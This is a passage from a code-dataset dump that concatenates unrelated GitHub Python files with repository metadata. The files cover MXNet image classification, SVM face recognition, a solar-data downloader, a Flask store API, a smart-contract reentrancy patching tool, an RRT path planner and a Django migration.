Prepares environment for the computation by allocating memory.\n# - `init_params` : Assigns and initializes parameters.\n# - `init_optimizer` : Initializes optimizers. Defaults to `sgd`.\n# - `metric.create` : Creates evaluation metric from input metric name.\n# - `forward` : Forward computation.\n# - `update_metric` : Evaluates and accumulates evaluation metric on outputs of the last forward computation.\n# - `backward` : Backward computation.\n# - `update` : Updates parameters according to the installed optimizer and the gradients computed in the previous forward-backward batch.\n# \n# We will save checkpoints for each epoch in \"cifar-epoch№.params\".\n# \n# **NOTE**: If you want to initialize parameters in a certain way, use the commented intermediate-level-interface functions: `mod.bind` and `mod.init_params` and set `force_init = False` in `mod.fit`. In this case `mod.fit` will raise a warning, that since parameters are already initialized, init_params call is ignored.\n\n# In[12]:\n\n\nmod.bind(data_shapes=train_data_iter.provide_data, label_shapes=train_data_iter.provide_label)\nmod.init_params(initializer=mx.init.Xavier(magnitude=2.))\n \nmod.fit(train_data_iter, # train data\n eval_data = test_data_iter, # validation data\n optimizer ='sgd', # use SGD to train\n optimizer_params = {'learning_rate' : 0.2}, # use fixed learning rate\n eval_metric = mx.metric.Accuracy(), # report accuracy during training\n num_epoch = 300, # train for at most 10 dataset passes\n epoch_end_callback = mx.callback.do_checkpoint('cifar'), \n force_rebind = True,\n force_init = False) \n\n\n# ### Run predictions for 10 example elements\n# \n# To predict with `module`, we, first, prepare a dataset for prediction and then call `mod.predict`. It will collect and\n# return all the prediction results.\n\n# In[13]:\n\n\npred_data_iter = mx.io.NDArrayIter(data={'data': test_img[0:batch_size]}, batch_size=batch_size)\npred_digits = mod.predict(eval_data=pred_data_iter).asnumpy()\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n# starting index of items we want to predict\npred_start = 10\n# number of items we want to predict\npred_number = 5\n\nfor i in range(pred_number):\n plt.subplot(1,pred_number,i+1)\n plt.imshow(test_img[i + pred_start].reshape(32,32), cmap='Greys')\n plt.axis('off')\n \nplt.show()\n\nfor x in range(pred_start, pred_start + pred_number):\n label = np.where(pred_digits[x,0:pred_number] == pred_digits[x,0:pred_number].max())[0]\n print(\"Predicted label for image %s is %s (%s)\" % (x, label, label_names[label[0]]))\n print(\"Correct label:\", label_names[test_lbl[x]])\n\n\n# # END OF THE FILE\n# Code below needs adjustments\n\n# ### Downloading images for prediction from amazon.com\n\n# In[ ]:\n\n\nurllib.request.urlretrieve('https://images-na.ssl-images-amazon.com/images/I/81OaXwn1x4L._UX679_.jpg', 'predict1.jpg')\nurllib.request.urlretrieve('https://images-eu.ssl-images-amazon.com/images/I/31TcgNHsbIL._AC_UL260_SR200,260_.jpg', 'predict2.jpg')\nurllib.request.urlretrieve('https://images-eu.ssl-images-amazon.com/images/I/41hWhZBIc3L._AC_UL260_SR200,260_.jpg', 'predict3.jpg')\n\n\n# ### Load model from checkpoint for prediction\n# \n# To load the saved module parameters, call the `mx.mod.load_checkpoint` function. It loads the symbolic definition of NN and all the associated parameters. We can then set the loaded parameters into the module.\n\n# In[ ]:\n\n\nprediction_model_check_point = 10\nprediction_model_prefix = 'fashion_mnist'\n\nprediction_sym, arg_params, aux_params = mx.model.load_checkpoint(prediction_model_prefix, prediction_model_check_point)\nprediction_model = mx.mod.Module(symbol=prediction_sym, data_names=['fashion_data'], label_names=['fashion_item_label'])\n\n\n# Now we need to bind the model with new data- and label shapes and restore the parameter values. Since we want to make predictions for one image at a time, the data shape now must be (1,1,28,28), label shape - (1,)\n\n# In[ ]:\n\n\nprediction_model.bind(for_training=False, data_shapes=[('fashion_data', (1,1,28,28))], label_shapes = [('fashion_item_label', (1,))])\nprediction_model.set_params(arg_params=arg_params, aux_params=aux_params, allow_missing=True)\n\n\n# Now we define the **prediction function** `predict_fashion`, which:\n# - takes image as an input\n# - formats it to the needed shape (1, 28, 28), since now it must be a one-element dataset\n# - creates a trivial data iterator of batch size 1\n# - makes and prints predictions\n\n# In[ ]:\n\n\ndef predict_fashion(img):\n # format data to run prediction\n array = np.full((1, 28, 28), img, dtype=np.float32)\n pred_data_iter = mx.io.NDArrayIter(data={'fashion_data': to4d(array)}, batch_size=1)\n pred_digits = prediction_model.predict(eval_data=pred_data_iter).asnumpy()\n label = (np.where(pred_digits[0] == pred_digits[0].max())[0])\n print(\"Predicted fashion label for image is %s (%s) \" % (label,fashion_labels[label[0]]))\n\n\n# ### Predict labels for downloaded images\n# \n# Here we first load the image and then adjust it to the colours (with help of bit-wise inversion `cv2.bitwise_not` ) and to the size (with `skimage.transform.resize`) of the training dataset\n\n# In[ ]:\n\n\nfor i in range(3):\n img = mpimg.imread('predict'+str(i+1)+'.jpg')\n plt.imshow(img)\n plt.axis('off')\n plt.show() \n # get colours in line with train data\n img = cv2.bitwise_not(img)\n img = np.array (np.mean(img, -1))\n\n # resize image\n img = skimage.transform.resize(img, (28, 28), mode ='reflect')\n\n predict_fashion(img)\n\n","repo_name":"b2net/AI_DL_AWS","sub_path":"MXNet/CIFAR10/Demo_CIFAR10.py","file_name":"Demo_CIFAR10.py","file_ext":"py","file_size_in_byte":12034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"70137706774","text":"from numpy import load\r\nfrom sklearn.preprocessing import LabelEncoder\r\nfrom sklearn.preprocessing import Normalizer\r\nfrom sklearn.metrics import confusion_matrix, accuracy_score\r\nfrom sklearn.metrics import plot_confusion_matrix\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn import svm\r\nfrom random import choice\r\nfrom numpy import load\r\nfrom numpy import expand_dims\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nimport datetime\r\nfrom info_logging import log\r\nimport pickle\r\nimport pandas as pd\r\n\r\ndef test(model):\r\n labels = []\r\n y_true = []\r\n y_pred = []\r\n\r\n data = load('Image_DataSet_100_processed-embeddings.npz')\r\n trainy, testX, testy = data['arr_1'], data['arr_2'], data['arr_3']\r\n # normalize input vectors\r\n in_encoder = Normalizer(norm='l2')\r\n testX = in_encoder.transform(testX)\r\n # label encode targets\r\n out_encoder = LabelEncoder()\r\n out_encoder.fit(trainy)\r\n testy = out_encoder.transform(testy)\r\n\r\n # load faces test\r\n data = load('Image_DataSet_100_processed.npz')\r\n testX_faces = data['arr_2']\r\n\r\n fig = plt.figure(figsize=(25, 10))\r\n idx = 0\r\n for itr in range(10):\r\n selection = choice([i for i in range(testX.shape[0])])\r\n random_face_pixels = testX_faces[selection]\r\n random_face_emb = testX[selection]\r\n random_face_class = testy[selection]\r\n random_face_name = out_encoder.inverse_transform([random_face_class])\r\n # prediction for the face\r\n samples = expand_dims(random_face_emb, axis=0)\r\n yhat_class = model.predict(samples)\r\n yhat_prob = model.predict_proba(samples)\r\n \r\n # get name\r\n class_index = yhat_class[0]\r\n class_probability = yhat_prob[0,class_index] * 100\r\n predict_names = out_encoder.inverse_transform(yhat_class)\r\n \r\n ax = fig.add_subplot(2, 5, idx + 1, xticks=[], yticks=[])\r\n idx += 1\r\n plt.imshow(random_face_pixels)\r\n ax.set_title(\"\\n\\nPredicted Name: {} \\n Actual Name: {} \\n probability: {}\".format(predict_names[0], random_face_name[0], class_probability),\r\n color=(\"green\" if predict_names[0] == random_face_name[0] else \"red\"))\r\n fig.savefig('test_visualization.jpg')\r\n log(\"Visualized results can be found in test_visualization.jpg file\")\r\n\r\n for selection in range(testy.shape[0]):\r\n random_face_pixels = testX_faces[selection]\r\n random_face_emb = testX[selection]\r\n random_face_class = testy[selection]\r\n random_face_name = out_encoder.inverse_transform([random_face_class])\r\n # prediction for the face\r\n samples = expand_dims(random_face_emb, axis=0)\r\n yhat_class = model.predict(samples)\r\n yhat_prob = model.predict_proba(samples)\r\n\r\n if random_face_name[0] not in labels:\r\n labels.append(random_face_name[0])\r\n y_true.append(random_face_name[0])\r\n \r\n # get name\r\n class_index = yhat_class[0]\r\n class_probability = yhat_prob[0,class_index] * 100\r\n predict_names = out_encoder.inverse_transform(yhat_class)\r\n y_pred.append(predict_names)\r\n\r\n return y_true, y_pred, labels\r\n\r\nif __name__ == '__main__':\r\n #load model\r\n filename = 'finalized_model.sav'\r\n model = pickle.load(open(filename, 'rb'))\r\n y_true, y_pred, label = test(model)\r\n score = accuracy_score(y_true, y_pred)\r\n log(\"Accuracy Score on test data: \" + str(score))\r\n cm = confusion_matrix(y_true, y_pred, labels=label)\r\n np.savetxt(\"confusion_mat.csv\", cm, delimiter=\",\")","repo_name":"gaurav82692/Face_detection_stack_svm","sub_path":"Other Codes/visualization - Copy.py","file_name":"visualization - Copy.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5467754802","text":"import matplotlib.pyplot as plt\nimport networkx as nx\nfrom dfs import undirected_cc\n\nsize = [40,30,30]\nprobs = [[0.1,0,0],[0,0.1,0],[0,0,0.1]]\n\n\n\nG= nx.stochastic_block_model(size,probs)\ncomponent = undirected_cc(G)\nprint (component)\npos = nx.spring_layout(G)\nnc = [component[v] for v in G.nodes()]\nnx.draw(G,pos,node_size=100,node_color=nc)\nplt.show()\n","repo_name":"lucatrevisan/lucatrevisan.github.io","sub_path":"code-samples/cc-test.py","file_name":"cc-test.py","file_ext":"py","file_size_in_byte":353,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"6180185229","text":"import urllib\nfrom urllib.error import HTTPError, URLError\nfrom bs4 import BeautifulSoup , SoupStrainer\nimport re\nimport datetime\nfrom dateutil.relativedelta import relativedelta\nfrom sunpy.time import parse_time\nimport numpy as np\n\nsavedir_a = \"/Users/laurahayes/spaceweather_stuff/fun_stuff/final_ahead/\"\nsavedir_b = \"/Users/laurahayes/spaceweather_stuff/fun_stuff/final_behind/\"\n\nt1 = parse_time(\"2011-01-01\").datetime\nt2 = parse_time(\"2014-10-01\").datetime\ndate_list = [t1]\n\nfrom parfive import Downloader\n\nwhile t2>=t1:\n t1 = t1 + relativedelta(days=1)\n date_list.append(t1)\n\nbase_url = \"https://www.solarmonitor.org/data/\"\n\nurl_tests_b = [d.strftime(base_url+\"%Y/%m/%d/fits/strb/\") for d in date_list]\nurl_tests_a = [d.strftime(base_url+\"%Y/%m/%d/fits/stra/\") for d in date_list]\n\nbeacon_url_a = \"https://stereo-ssc.nascom.nasa.gov/data/beacon//ahead/secchi/img/euvi/\"\nbeacon_url_b = \"https://stereo-ssc.nascom.nasa.gov/data/beacon//behind/secchi/img/euvi/\"\n\n\nbeacon_test_a = [d.strftime(beacon_url_a+\"%Y%m%d/\") for d in date_list]\nbeacon_test_b = [d.strftime(beacon_url_b+\"%Y%m%d/\") for d in date_list]\n\n\ndef list_path_files(url_path, file_name):\n test = urllib.request.urlopen(url_path)\n soup = BeautifulSoup(test, features=\"lxml\")\n\n fits_links = []\n for link in soup.findAll('a'):\n if link.get('href') is not None and link.get('href').find(file_name) != -1:\n fits_links.append(url_path + link.get('href').split('/')[-1]) \n\n return fits_links\n\ndef find_file_times(file_name):\n if isinstance(file_name, (list, np.array)):\n t_list = []\n for i in range(len(file_name)):\n t = re.search('\\d{8}_\\d{6}', file_name[i]).group()\n tt = datetime.datetime.strptime(t, '%Y%m%d_%H%M%S')\n t_list.append(tt)\n return t_list\n else:\n\n t = re.search('\\d{8}_\\d{6}', file_name).group()\n tt = datetime.datetime.strptime(t, '%Y%m%d_%H%M%S')\n return tt\n\ndef get_urls_hours(beacon_tests):\n files_beacon = []\n for u in beacon_tests:\n print(u)\n try:\n urls = list_path_files(u, \"fts\")\n files_beacon.append(urls)\n except HTTPError:\n print(\"error\")\n files_beacon.append([])\n\n datess = [find_file_times(x) for x in files_beacon]\n hours = []\n for d in datess:\n try:\n hours.append(parse_time(d).strftime(\"%H\").astype(int))\n except:\n hours.append([])\n\n date_list_12 = [d + relativedelta(hours=12) for d in date_list]\n\n testy = []\n final_urls = []\n for i in range(len(datess)):\n if len(datess[i])>0:\n ind = np.argmin(np.abs(np.array(datess[i]) - date_list_12[i]))\n testy.append(datess[i][ind])\n final_urls.append(files_beacon[i][ind])\n else:\n testy.append([])\n final_urls.append([])\n return files_beacon, final_urls, testy\n\n# all_ahead, final_ahead, time_ahead = get_urls_hours(beacon_test_a)\n# all_behind, final_behind, time_behind = get_urls_hours(beacon_test_b)\n\ndef save_files():\n lala = {\"file_list\":files_beacon_ahead, \"final_urls\":final_urls, \"dates_final\":testy}\n lala2 = {\"file_list\":all_behind, \"final_urls\":final_behind, \"dates_final\":time_behind}\n with open(\"ahead_files.pkl\", \"wb\") as handle:\n pickle.dump(lala, handle)\n\n with open(\"behind_files.pkl\", \"wb\") as handle:\n pickle.dump(lala2, handle)\n\n\ndef download_files(file_list, savedir):\n dl = Downloader()\n for f in file_list:\n dl.enqueue_file(f, path=savedir)\n files = dl.download()\n\ndef download_files2(file_list, savedir):\n for f in file_list:\n if isinstance(f, str):\n fname = savedir + f.split(\"/\")[-1]\n urllib.request.urlretrieve(f, fname)\n else:\n print(f)\n\n\n# filess = []\n# for u in url_tests_a:\n# print(u)\n# try:\n# urls = list_path_files(u, \"fts.gz\")\n# filess.append(urls)\n# except HTTPError:\n# print(\"error\")\n# filess.append([])","repo_name":"hayesla/STEREO-AIA-stereoscopic-analysis","sub_path":"getting_beacon_data_tests.py","file_name":"getting_beacon_data_tests.py","file_ext":"py","file_size_in_byte":4014,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"67"} +{"seq_id":"16413009861","text":"import uuid\nfrom flask import request\nfrom flask.views import MethodView\nfrom flask_smorest import abort, Blueprint\nfrom db import stores\nfrom schemas import StoreSchema\n\nblp = Blueprint(\"stores\", __name__, description=\"Operations on Stores\")\n\n\n@blp.route(\"/store\")\nclass Store(MethodView):\n @blp.response(200, StoreSchema(many=True))\n def get(self):\n # return {\"stores\": list(stores.values())}\n return stores.values()\n\n @blp.arguments(StoreSchema)\n @blp.response(201, StoreSchema)\n def post(self, data):\n # data = request.get_json()\n\n # if \"name\" not in data:\n # abort(400, message=\"Bad Request, 'name' must be included\")\n\n for store in stores.values():\n if data[\"name\"] == store[\"name\"]:\n abort(400, message=\"This store name is already used.\")\n storeId = uuid.uuid4().hex\n # newStore = {\"name\": data[\"name\"], \"items\": []}\n # kwargs bcoz data is a str else data.copy() or just data\n store = {**data, \"store_id\": storeId}\n stores[storeId] = store\n # return store, 201\n return store\n\n\n@blp.route(\"/store/\")\nclass Store(MethodView):\n @blp.response(200, StoreSchema)\n def get(self, storeId):\n try:\n return stores[storeId]\n except KeyError:\n # return {\"error\": \"Store not found\"}, 404\n abort(400, message=\"Bad Request, 'name' must be included\")\n\n def delete(self, storeId):\n try:\n del stores[storeId]\n return {\"message\": \"Store deleted\"}\n except KeyError:\n abort(404, message=\"Store not found\")\n","repo_name":"1998tapan/StoreRepoFlask","sub_path":"resources/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"71368163415","text":"def problem1(n):\n if n == 0:\n return 0 \n return n + problem1(n-1)\n# print(problem1(4))\n\n# 584321\n# 1\n# 2\n# 3\n# 4\n\ndef problem2(n,total=0):\n if n//10 == 0:\n total += n\n return total \n total+= n%10\n n=n//10\n return problem2(n,total)\nprint(problem2(584321))\n","repo_name":"KhuziamaR/Data-Structures-Algorithms-","sub_path":"DSA_Python/recursion/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"28303033134","text":"from django.db import models\r\nfrom django.utils.translation import gettext_lazy as _\r\n\r\n\r\nclass Assistentes(models.Model):\r\n \"\"\"Os Assistentes de uma instancia.\r\n\r\n \"\"\"\r\n\r\n\r\n militante = models.ForeignKey(\r\n to='core.Militantes',\r\n verbose_name=_('militante'),\r\n on_delete=models.CASCADE,\r\n related_name='assistencias',\r\n )\r\n\r\n instancia = models.ForeignKey(\r\n to='core.Instancias',\r\n verbose_name=_('instancia'),\r\n on_delete=models.CASCADE,\r\n related_name='assistentes',\r\n )\r\n\r\n class Meta:\r\n verbose_name = _('assistente')\r\n verbose_name_plural = _('assistentes')\r\n\r\n def __str__(self):\r\n\r\n return f'{self.militante.apelido}'\r\n","repo_name":"lsd1953/mar-len","sub_path":"backend/core/models/assistentes.py","file_name":"assistentes.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"42826437215","text":"import logging\n\nlog = logging.getLogger(__name__)\n\n\ndef slicing(source, call, dfg, sequence, discarded):\n # call是call的指令\n # source是当前的指令\n slices = []\n deps = set()\n overs = set()\n trv_stack = [source]\n visited = {node: False for node in dfg.nodes()}\n nodes = dfg.nodes()\n # 意思是sstore肯定要丢弃\n discarded.add(source)\n\n while len(trv_stack) > 0:\n instr = trv_stack[0]\n if visited[instr]:\n visited[instr] = False\n # 后序遍历后,又先序输出\n slices.append(instr)\n trv_stack.pop(0)\n else:\n visited[instr] = True\n if instr == call:\n raise RuntimeError('Violating data flow dependencies. CALL: {:#x}, lift: {:#x}'.format(call, instr))\n if not nodes[instr]['instr'].reserved:\n # 枚举数据流的相关指令\n # suc是后继啦\n for suc in dfg[instr]:\n if suc not in discarded:\n break\n # 循环正常进行则将该指令加入丢弃序列,即后继所有指令都需丢弃\n # 如果它后继的所有指令都需要丢弃,则它也需要丢弃\n else:\n discarded.add(instr)\n\n # dependence则记录的是和地址相关的东西\n # overwrite也是记录的修改地址的东西\n for dep in nodes[instr]['instr'].dependence:\n if dep in sequence:\n # 如果dependence里面还包括该序列则说明\n deps.add(dep)\n overs.update(nodes[instr]['instr'].overwrite)\n for pre in dfg.predecessors(instr):\n # 后序遍历,重复说明有环,报错\n if visited[pre]:\n raise RuntimeError('Error slicing, loop detected. lift: {:#x}, pre: {:#x}'.format(instr, pre))\n trv_stack.insert(0, pre)\n return slices, deps, overs\n\n\ndef lifting(sstore, call, dfg, trace, sliced, lifted, discarded):\n # 判断call,sstore是否在记录序列中\n if (call, sstore) not in trace:\n raise KeyError('Error tracing executed instructions from CALL to SSTORE. CALL: {:#x}, SSTORE: {:#x}'\n .format(call, sstore))\n # 初始栈只放sstore的指令位置\n lift_stack = [sstore]\n # 获取记录的call,sstore trace集合\n sequence = trace[(call, sstore)]\n # 获取数据流中的节点\n nodes = dfg.nodes()\n #\n lifts = set()\n overwrites = set()\n dependencies = set()\n num = 0\n while len(lift_stack) > 0:\n num += 1\n if num >= 10000:\n raise RuntimeError('loop')\n instr = lift_stack.pop(0)\n # if nodes[call]['instr'].layer != nodes[instr]['instr'].layer:\n # raise RuntimeError('Violating control flow dependencies. CALL: {:#x}, lift: {:#x}'.format(call, instr))\n name = nodes[instr]['instr'].name\n num += 1\n\n # 如果中间的指令遇到这几个调用,则报错\n if name == 'CALL' or name == 'CALLCODE' or name == 'DELEGATECALL' or name == 'STATICCALL':\n raise RuntimeError('Cannot lift CALL, CALLCODE, DELEGATECALL or STATICCALL. CALL: {:#x}, lift: {:#x}'\n .format(call, instr))\n\n # 开始分片\n slices, deps, overs = slicing(instr, call, dfg, sequence, discarded)\n # slices指从当前指令开始前序找所有与之关联的指令\n lifts.update(slices)\n overwrites.update(overs)\n if instr not in sliced:\n sliced[instr] = slices\n if instr not in lifted:\n lifted[instr] = {call: sequence}\n else:\n if call not in lifted[instr]:\n for pos in dict(lifted[instr]):\n if call in lifted[instr][pos]:\n break\n elif pos in sequence:\n lifted[instr][call] = sequence\n del lifted[instr][pos]\n break\n else:\n lifted[instr][call] = sequence\n\n for dep in deps:\n lift_stack.insert(0, dep)\n for instr in sequence.difference(lifts):\n dependencies.update(nodes[instr]['instr'].dependence)\n # 重写的指令里面不能有dependencies相关的指令\n if len(overwrites.intersection(dependencies)) > 0:\n raise RuntimeError('Violating memory/storage dependencies. CALL: {:#x}, SSTORE: {:#x}'.format(call, sstore))\n\n\ndef set_report(report, call, sstore, msg):\n report['Reentrancy'].append(\n {\n 'callOffset': call,\n 'sStoreOffset': sstore,\n 'result': msg\n }\n )\n\n\ndef execute(dfg, trace, reentrancy, report):\n sliced = {}\n lifted = {}\n discarded = set()\n for vul in reentrancy:\n call = vul[0]\n sstore = vul[1]\n old_sliced = sliced.copy()\n old_lifted = lifted.copy()\n old_discarded = discarded.copy()\n try:\n lifting(sstore, call, dfg, trace, sliced, lifted, discarded)\n except Exception as e:\n if str(e).strip('\\'') == 'Timeout.':\n raise e\n else:\n sliced = old_sliced\n lifted = old_lifted\n discarded = old_discarded\n set_report(report, call, sstore, str(e).strip('\\''))\n else:\n set_report(report, call, sstore, 'Done.')\n nodes = dfg.nodes()\n for instr in discarded:\n nodes[instr]['instr'].discarded = True\n patches = {}\n for instr in lifted:\n for pos in lifted[instr]:\n if pos not in patches:\n patches[pos] = {}\n # 但其实所有lifted里面都是 call:sequence啊\n # 也就是存储的patches[call][instr]\n patches[pos][instr] = sliced[instr]\n return call, patches\n","repo_name":"eliQAQ/detect-vulnerable-contract","sub_path":"patch/patch.py","file_name":"patch.py","file_ext":"py","file_size_in_byte":5948,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"4083999966","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis is a module for the data in the interactive Jupyternotebook.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndata = pd.read_csv(\"./data/data_combined_final.csv\")\n\n\ndef get_data():\n \"\"\"Function to get the data.\"\"\"\n return data\n\ndef get_user_feedback(user_value, data, variable):\n \"\"\"This functions return the user feedback when comparing the user input data to the data in the dataset\"\"\"\n if user_value < data[variable].mean():\n feedback = f\"You have a lower value than the average person. \\n The difference is {round(data[variable].mean() - user_value, 2)}.\"\n elif user_value == data[variable].mean():\n feedback = f\"You have the same value as the average person.\"\n else:\n feedback = f\"You have a higher value than the average person. \\n The difference is {round(user_value - data[variable].mean(), 2)}.\"\n return feedback\n\ndef plot(dataset, userdata, plotted_variables):\n \"\"\"Function to plot a scatterplot of the data with the input of the user\n if the input plotted_variables is length is one the x-axis does not have any value \n and the y-axis is the value of the variable in plotted_variables\"\"\"\n\n if len(plotted_variables) == 1:\n variable = plotted_variables[0]\n y_data = dataset[variable]\n x_data = [0.5]*len(y_data)\n y_user = userdata[variable]\n x_user = 0.5\n \n else:\n x_data = dataset[plotted_variables[0]]\n y_data = dataset[plotted_variables[1]]\n x_user = userdata[plotted_variables[0]]\n y_user = userdata[plotted_variables[1]]\n \n\n # if the plotted is just one variable the x-axis does not have any value name and any values\n if len(plotted_variables) == 1:\n plt.figure(figsize=(10, 6))\n plt.xlabel(' ')\n plt.xticks([])\n plt.ylabel(plotted_variables[0])\n\n plt.scatter(x_data, y_data, color='pink', marker='o', s=100, alpha=0.5, label='Data')\n plt.scatter([x_user], [y_user], color='purple', marker='o', s=100, label=userdata['Name'])\n plt.axhline(y=y_data.mean(), color='black', linestyle='--', label=f\"Average {plotted_variables[0]}\")\n y_min, y_max = plt.ylim()\n x_min, x_max = plt.xlim()\n feedback = get_user_feedback(userdata[plotted_variables[0]], dataset, plotted_variables[0])\n plt.text(x_min + 0.56*(x_max-x_min), y_min + 0.4*(y_max-y_min), feedback, fontsize = 10)\n plt.legend()\n # if the plotted is two variables the x-axis and y-axis have values and value names\n else:\n plt.figure(figsize=(10, 6))\n\n plt.xlabel(plotted_variables[0])\n plt.ylabel(plotted_variables[1])\n\n plt.scatter(x_data, y_data, color='pink', marker='o', s=100, alpha=0.5, label='Data')\n plt.scatter([x_user], [y_user], color='purple', marker='o', s=100, label=userdata['Name'])\n plt.axhline(y=y_data.mean(), color='black', linestyle='--', label= f\"Average {plotted_variables[1]} \" )\n #plt.axvline(x=x_data.mean(), color='black', linestyle='--', label= f\"Average {plotted_variables[0]}\")\n y_min, y_max = plt.ylim()\n x_min, x_max = plt.xlim()\n feedback_x = get_user_feedback(userdata[plotted_variables[0]], dataset, plotted_variables[0])\n feedback_y = get_user_feedback(userdata[plotted_variables[1]], dataset, plotted_variables[1])\n #plt.text(x_min + 0.56*(x_max-x_min), y_min + 0.4*(y_max-y_min), feedback_x, fontsize = 10)\n plt.text(x_min + 0.56*(x_max-x_min), y_min + 0.3*(y_max-y_min), feedback_y, fontsize = 10)\n plt.legend()\n\n","repo_name":"heksaani/DataScienceProject","sub_path":"modules/data_module.py","file_name":"data_module.py","file_ext":"py","file_size_in_byte":3603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"30634528618","text":"import pygame\nimport random\nimport math\nimport time\nfrom node import Node\n\nscreen_width = 1000\nscreen_height = 1000\nscreen = pygame.display.set_mode((screen_width, screen_height))\nblack = (0, 0, 0)\nwhite = (255, 255, 255)\nred = (255, 0, 0)\nblue = (0, 0, 255)\ngreen = (55, 155, 222)\npurple = (128, 0, 128)\n\ndef euclidean_distance(x1, y1, x2, y2):\n return math.sqrt((x1 - x2) ** 2 + (y1 - y2) ** 2)\n\nclass RRT:\n def __init__(self, start, goal, obstacles):\n self.start = Node(start[0], start[1])\n self.goal = Node(goal[0], goal[1])\n self.obstacles = obstacles\n self.nodes = [self.start]\n self.edges = []\n\n def generate_rrt(self, k, delta_t, max_paths):\n paths = []\n found_paths = 0\n shortest_path = None\n shortest_distance = math.inf\n\n while found_paths < max_paths:\n path = None\n for i in range(k):\n rand_node = self.random_state()\n nearest_node = self.nearest_neighbor(rand_node)\n u = self.select_input(rand_node, nearest_node)\n new_node = self.new_state(nearest_node, u, delta_t)\n if not self.collision(new_node, nearest_node):\n self.nodes.append(new_node)\n new_node.parent = nearest_node\n self.edges.append((nearest_node, new_node, u))\n pygame.draw.line(screen, blue, (nearest_node.x, nearest_node.y), (new_node.x, new_node.y), 2)\n pygame.display.update()\n if self.goal_reached(new_node):\n path = self.get_path(new_node)\n break\n if path is not None:\n paths.append(path)\n found_paths += 1\n self.exclude_nodes(path)\n\n # Draw the path in red\n for i in range(len(path) - 1):\n pygame.draw.line(screen, red, (path[i].x, path[i].y), (path[i + 1].x, path[i + 1].y), 3)\n pygame.display.update()\n\n # Calculate the path distance\n path_distance = sum(euclidean_distance(path[i].x, path[i].y, path[i+1].x, path[i+1].y) for i in range(len(path) - 1))\n if path_distance < shortest_distance:\n shortest_distance = path_distance\n shortest_path = path\n\n # Draw the shortest path in purple\n if shortest_path:\n for i in range(len(shortest_path) - 1):\n pygame.draw.line(screen, purple, (shortest_path[i].x, shortest_path[i].y),\n (shortest_path[i + 1].x, shortest_path[i + 1].y), 4)\n pygame.display.update()\n\n return paths\n\n def random_state(self):\n x = random.randint(0, screen_width)\n y = random.randint(0, screen_height)\n return Node(x, y)\n\n def nearest_neighbor(self, node):\n min_distance = math.inf\n nearest_node = None\n for n in self.nodes:\n distance = euclidean_distance(n.x, n.y, node.x, node.y)\n if distance < min_distance:\n min_distance = distance\n nearest_node = n\n return nearest_node\n\n def select_input(self, rand_node, nearest_node):\n return math.atan2(rand_node.y - nearest_node.y, rand_node.x - nearest_node.x)\n\n def new_state(self, nearest_node, u, delta_t):\n x = nearest_node.x + delta_t * math.cos(u)\n y = nearest_node.y + delta_t * math.sin(u)\n return Node(x, y)\n\n def line_intersection(self, p1, p2, q1, q2):\n def clockwiseLineSegment(A, B, C):\n return (C.y - A.y) * (B.x - A.x) > (B.y - A.y) * (C.x - A.x)\n if (p1 == q1) or (p1 == q2) or (p2 == q1) or (p2 == q2):\n return False\n return (clockwiseLineSegment(p1, q1, q2) != clockwiseLineSegment(p2, q1, q2)) and (clockwiseLineSegment(p1, p2, q1) != clockwiseLineSegment(p1, p2, q2))\n\n def collision(self, node, parent_node):\n for obstacle in self.obstacles:\n p1 = parent_node\n p2 = node\n rect_points = [\n (obstacle.left, obstacle.top),\n (obstacle.left, obstacle.bottom),\n (obstacle.right, obstacle.bottom),\n (obstacle.right, obstacle.top),\n ]\n for i in range(len(rect_points)):\n q1 = Node(rect_points[i][0], rect_points[i][1])\n q2 = Node(rect_points[(i + 1) % len(rect_points)][0], rect_points[(i + 1) % len(rect_points)][1])\n\n if self.line_intersection(p1, p2, q1, q2):\n return True\n return False\n\n def goal_reached(self, node):\n goal_radius = 50\n goalFlag = euclidean_distance(self.goal.x, self.goal.y, node.x, node.y) < goal_radius\n return goalFlag\n\n def get_path(self, node):\n path = []\n while node.parent is not None:\n path.append(node)\n node = node.parent\n path.append(self.start)\n path.reverse()\n return path\n\n def exclude_nodes(self, nodes_to_exclude):\n self.nodes = [node for node in self.nodes if node not in nodes_to_exclude]","repo_name":"dravendoom/RRTvisualize","sub_path":"rrt.py","file_name":"rrt.py","file_ext":"py","file_size_in_byte":5199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36856972132","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport autoslug.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('popolo', '__first__'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Category',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=512)),\n ('slug', autoslug.fields.AutoSlugField(editable=False)),\n ],\n options={\n 'verbose_name': 'Category',\n 'verbose_name_plural': 'Categories',\n },\n ),\n migrations.CreateModel(\n name='Fulfillment',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('percentage', models.PositiveIntegerField(default=0)),\n ('status', models.TextField(default=b'', 